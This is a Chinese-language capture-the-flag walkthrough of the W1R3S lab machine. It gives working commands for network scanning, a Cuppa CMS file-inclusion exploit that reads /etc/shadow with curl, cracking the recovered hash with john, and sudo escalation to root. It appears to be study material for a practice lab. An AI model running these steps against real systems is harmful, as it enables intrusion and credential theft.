05w1r3s打靶记录

你是慕鸢呀~ 发布于 26 天前 2 次阅读 949 字 预计阅读时间: 4 分钟


内容目录

05w1r3s打靶记录

关键词:ftp信息泄露,cms漏洞,远程任意文件包含、任意文件读取


流程记录

  1. 确定目标

    nmap -sP 192.168.89.1/24  
  2. 扫描全端口

    nmap -sT --min-rate 10000 -p- 192.168.89.135
  3. 探测暴露端口服务版本等具体信息

    sudo nmap -sT -sC -O -p21,22,53,80,3306 192.168.89.135
  4. ftp弱口令利用,有效信息不多

    | ftp-anon: Anonymous FTP login allowed (FTP code 230)
    | drwxr-xr-x    2 ftp      ftp          4096 Jan 23  2018 content
    | drwxr-xr-x    2 ftp      ftp          4096 Jan 23  2018 docs
    |_drwxr-xr-x    2 ftp      ftp          4096 Jan 28  2018 new-employees
    get 命令可以下载指定文件,浏览文件使用ls 退出时exit
  5. 常规爆破80端口目录,识别cms

    dirb http://192.168.89.135/ 
    通过网页标题可以看出这是Cuppa CMS 
    http://192.168.89.135/administrator/installation/
    使用指纹识别工具也可以
    whatweb http://192.168.89.135/administrator/installation/                                      
    http://192.168.89.135/administrator/installation/ [200 OK] Apache[2.4.18], Cookies[PHPSESSID,country,language], Country[RESERVED][ZZ], HTML5, HTTPServer[Ubuntu Linux][Apache/2.4.18 (Ubuntu)], IP[192.168.89.135], JQuery, Script[text/javascript], Title[Cuppa CMS], X-UA-Compatible[IE=edge]
  6. 尝试使用Cuppa这个cms的exp,远程文件读取漏洞,由于常规url请求是get请求,无法返回敏感信息,所以这里采用curl,直接读取shadow,并保存关键行到本地

    exp 链接 https://www.exploit-db.com/exploits/25971
    curl --data-urlencode urlConfig=../../../../../../../../../etc/shadow http://192.168.89.135/administrator/alerts/alertConfigField.php
    w1r3s用户的那一行
    w1r3s:$6$xe/eyoTx$gttdIYrxrstpJP97hWqttvc5cGzDNyMb0vSuppux4f2CcBv3FwOt2P1GFLjZdNqjwRuP3eUjkgb/io7x9q1iP.:17567:0:99999:7:::

    一点漏洞利用的辨析
    直接通过浏览器访问 URL 和使用 curl 命令发送请求的行为有所不同,具体原因通常和 Web 应用的处理逻辑、HTTP 请求方法以及服务器如何响应这些请求有关。让我逐一解释一下:

    • 直接访问 URL:通过浏览器直接访问时,默认是通过 GET 请求。浏览器会把 URL 的查询参数(例如 urlConfig=../../../../../../../etc/passwd)作为查询字符串发送。
    • 使用 curl:你使用的 curl 命令通过 --data-urlencode 参数发送的是一个 POST 请求,并且在请求体中包含了 URL 编码的 urlConfig 参数。

    不同的 HTTP 方法(GET 和 POST)在 Web 应用中的处理方式可能是不同的,尤其是在处理用户输入时。如果目标 PHP 文件 (alertConfigField.php) 只处理 POST 请求中的 urlConfig 参数,而没有处理 GET 请求中的相同参数,那么 直接通过浏览器访问 URL 可能无法触发文件包含,因为没有正确地处理 GET 请求中的参数。

  7. 使用john爆破密码

    john pass.txt
    
    Proceeding with wordlist:/usr/share/john/password.lst
    computer         (w1r3s)  
  8. ssh登录主机,提权为root

    sudo -l 
    返回值关键内容
    User w1r3s may run the following commands on W1R3S.localdomain:
       (ALL : ALL) ALL
    
    这意味着w1r3s 用户可以在该系统上以任何用户身份运行任何命令(包括root)
    直接sudo bash或者sudo -i 即可获取root权限
    甚至可以编辑/etc/sudoers文件
    直接修改 /etc/sudoers 文件时,必须通过 visudo,否则容易导致语法错误,可能会锁定所有用户的 sudo 权限。
    在实际工作中,尽量避免直接编辑 /etc/sudoers 文件,而是在 /etc/sudoers.d/ 中添加规则文件。
  9. 进入root根目录,获取fllag

    -----------------------------------------------------------------------------------------
      ____ ___  _   _  ____ ____      _  _____ _   _ _        _  _____ ___ ___  _   _ ____  
     / ___/ _ \| \ | |/ ___|  _ \    / \|_   _| | | | |      / \|_   _|_ _/ _ \| \ | / ___| 
    | |  | | | |  \| | |  _| |_) |  / _ \ | | | | | | |     / _ \ | |  | | | | |  \| \___ \ 
    | |__| |_| | |\  | |_| |  _ <  / ___ \| | | |_| | |___ / ___ \| |  | | |_| | |\  |___) |
     \____\___/|_| \_|\____|_| \_\/_/   \_\_|  \___/|_____/_/   \_\_| |___\___/|_| \_|____/ 
    
    -----------------------------------------------------------------------------------------
    
                             .-----------------TTTT_-----_______
                           /''''''''''(______O] ----------____  \______/]_
        __...---'"""\_ --''   Q                               ___________@
    |'''                   ._   _______________=---------"""""""
    |                ..--''|   l L |_l   |
    |          ..--''      .  /-___j '   '
    |    ..--''           /  ,       '   '
    |--''                /           `    \
                         L__'         \    -
                                       -    '-.
                                        '.    /
                                          '-./
    
    ----------------------------------------------------------------------------------------
     YOU HAVE COMPLETED THE
                  __      __  ______________________   _________
                 /  \    /  \/_   \______   \_____  \ /   _____/
                 \   \/\/   / |   ||       _/ _(__  < \_____  \ 
                  \        /  |   ||    |   \/       \/        \
                   \__/\  /   |___||____|_  /______  /_______  /.INC
                        \/                \/       \/        \/        CHALLENGE, V 1.0
    ----------------------------------------------------------------------------------------
    
    CREATED BY SpecterWires
    
    ----------------------------------------------------------------------------------------

总结与提升

  • 对于文件包含漏洞的分析,可以下载这个cms的源码进行查看,在靶机的down目录和/var/www/html/目录
  • 还有另一个cms,worldpress可以分析一下
  • 可以尝试利用别的工具发送post请求

今天先写这么多,后续再进行补充,欢迎留言

我本桀骜少年臣,不信鬼神不信人。
最后更新于 2024-12-22